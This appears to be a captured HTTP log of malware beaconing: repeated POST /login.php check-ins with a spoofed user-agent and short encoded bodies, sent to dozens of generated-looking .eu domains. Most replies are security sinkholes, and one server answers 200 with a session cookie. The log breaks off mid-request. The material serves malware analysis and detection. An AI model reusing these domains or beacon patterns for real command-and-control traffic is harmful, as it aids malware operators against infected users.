User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:41:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
51
sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...
0
(The same 200 OK response, with identical headers and chunked body, was captured four more times on this keep-alive connection.)
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:09 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:31 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 02 Sep 2016 17:41:54 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /login.php was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>
</body></html>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 02 Sep 2016 17:41:54 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /login.php was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>
</body></html>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=25d7c5d399560c85bd203fa61188924f; Expires=Fri, 01 Sep 2023 17:42:02 GMT
Date: Fri, 02 Sep 2016 17:42:02 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
